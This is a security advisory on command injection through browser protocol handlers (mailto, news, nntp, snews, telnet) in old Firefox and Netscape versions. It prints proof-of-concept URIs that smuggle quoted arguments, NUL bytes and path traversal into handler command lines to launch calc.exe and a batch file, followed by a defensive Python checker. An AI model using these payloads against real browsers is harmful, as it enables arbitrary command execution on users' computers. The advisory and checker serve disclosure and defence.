source: https://www.securityfocus.com/bid/25053/info

Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers.

Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers.

An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.

Exploiting these issues would permit remote attackers to influence command options that can be called through protocol handlers and to execute commands with the privileges of a user running the application. Successful attacks may result in a variety of consequences, including remote unauthorized access.

Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9 are reported vulnerable to these issues. Other versions of these browsers and other vendors' browsers may also be affected.

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat
news:windows/system32/calc.exe%20"%20-%20"%20blah.bat
snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat
telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l
news:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1
nntp:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1
snews:// "%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1
mailto:// C:\lotus\notes\notes.exe /defini %1
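
The handler command lines above take the URI in a %1 or %l slot, so any quote or space that survives into that slot changes the argument list the handler sees. The following Python is an added example, not code from the advisory or from any browser: it checks a URI before hand-off and models the resulting argument list. The character checks, the simplified splitter (it is not the Windows command-line parser) and the assumption that the handler receives the percent-decoded URI are illustrative assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Schemes the advisory shows being handed to external handlers.
EXTERNAL_SCHEMES = {"mailto", "nntp", "news", "snews", "telnet"}
# Handler command line and sample URI as listed on the page (quotes normalised).
TEMPLATE = r'"%ProgramFiles%\Outlook Express\msimn.exe" /newsurl:%1'
PAGE_SAMPLE = 'news:windows/system32/calc.exe%20"%20-%20"%20blah.bat'

def handoff_problems(uri):
    """Reasons a URI should not be substituted into a handler's %1 / %l slot."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in EXTERNAL_SCHEMES:
        return ["scheme is not on the external-handler list"]
    raw = unquote_to_bytes(rest)  # look at the bytes after %xx decoding
    problems = []
    if b"\x00" in raw:
        problems.append("NUL byte")
    if b'"' in raw:
        problems.append("double quote")
    if any(w in raw for w in (b" ", b"\t", b"\r", b"\n")):
        problems.append("whitespace")
    if b"../" in raw or b"..\\" in raw:
        problems.append("path traversal")
    return problems

def split_args(cmdline):
    """Simplified quote-aware splitter: a model, not the Windows parser."""
    args, cur, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch in " \t" and not quoted:
            if cur:
                args.append(cur)
            cur = ""
        else:
            cur += ch
    return args + [cur] if cur else args

def expand(template, uri):
    """Argument list after the decoded URI replaces %1 / %l (assumed hand-off)."""
    decoded = unquote_to_bytes(uri).decode("latin-1")
    return split_args(re.sub(r"%[1l]", lambda m: decoded, template))

if __name__ == "__main__":
    for uri in ("news:comp.security.misc", PAGE_SAMPLE):
        print(uri, handoff_problems(uri), len(expand(TEMPLATE, uri)), "args")
```

A newsgroup URI without quotes or spaces yields the two arguments the handler expects, while the page's sample yields four, which is the condition the check rejects before substitution.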